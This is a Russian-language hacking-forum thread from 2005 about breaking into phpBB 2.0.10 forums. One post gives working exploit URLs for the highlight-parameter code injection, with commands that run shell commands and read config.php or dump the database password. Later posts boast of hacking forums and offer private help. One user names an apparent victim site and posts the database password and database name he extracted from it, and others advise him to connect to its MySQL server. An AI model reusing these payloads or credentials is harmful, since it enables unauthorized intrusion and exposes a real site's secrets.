Форумы Есть ли уязвимости в phpbb 2.0.10?

Discussion in 'Уязвимости CMS/форумов' started by maR, 9 Nov 2005.

  1. maR

    maR New Member

    Joined:
    19 Oct 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    возможен ли взлом? :eek:
     
  2. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    sid удаляй, data заменяй на:
    в куках =))
     
  3. koldun

    koldun Banned

    Joined:
    23 Sep 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    сначало античат ПРОЧИТАЙ
    Уязвимость в phpBB <= 2.0.10


    http://[target]/forum/viewtopic.php?p=123&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
    Условия срабатывания - тема p=123 должна существовать.

    Пример http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=$dbpasswd.%2527
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    а если лень руками вбивать идешь на rst.void.ru качаешь оотуда сплойт на перле для версии 2.0.10 и пользуешься на здоровье=) только вот не думаю что остались сайты с уязвимыми десятками..
     
  5. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    m0nzt3r, я вчера ломал челу форум phpbb 2.0.6 , где было зарегано 14300человек =)

    maR, а если ничего не выйдет, смело стучись мне в асю, помогу!
     
  6. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    народ чота неработает наверно прикрыли!!!!!
     
  7. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    А ты точно уверен что десятка стоит? Если не работает:
    1. Руки...
    2. Прикрыли...
    Решение: попробуй снифак зафигачить...
     
  8. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Dark Angel, стучись в асю или пиши в приват-помогу. =) Десятки(если это действительно десятки) ломаются легко.
     
    1 person likes this.
  9. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    да ето десятка там снизу написена же
    Powered by phpbb 2.0.10
     
  10. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Dark Angel
    Админ там может написать всё что угодно для замыливания глаз))
    На самом деле может быть пропатчен, или же новая версия стоять..
    Всё равно удачи те!
     
  11. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    я тож так думаю!!!а как-нить можна узнавать какой версии етот форум
     
  12. fixer2

    fixer2 New Member

    Joined:
    5 Dec 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    У меня есть схожая проблема. Версия форума - 2.0.10, но он стоит на smallnuke. Какие варианты есть, подскажите?

    ...еще очень часто встречаю phpbb на пхп-нюках, как их ломать? Все говорят что нюк - самая бажная система, но тем не менее я не смог найти ни один сплоит или sql-inj для современных версий.
     
    #12 fixer2, 14 Dec 2005
    Last edited: 14 Dec 2005
  13. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Dark Angel
    Попробуй экслойты каких-нить других версий! Может для 2.0.18 или ниже подойдёт?
    http://forum.antichat.ru/thread10613.html
    Вот почитай!
     
  14. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    народ всё работает ето просто все пропеченые наверно паподались!!! после 3 часов поиска нашол нормалный вот он!!!!
    http://www.gorodzelenogorsk.ru/forum/index.php

    ну палучил вот ето:
    dbpasswd---------PawHikat
    dbname-----------host2254
    заважу в FTP и нифега!!!!
    чо может быть с партом ошибся????
     
  15. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    ну вообще-то если ты не видишь у тебя логин и пароль от БД, а не от ФТП.. =)

    к сведению: Пароли БД не всегда подходят к ФТП.. так что коннект делай к MySQL =)
    имхо)
     
  16. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    не понел обясника паподробнее чайнику!!!!!
     
  17. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2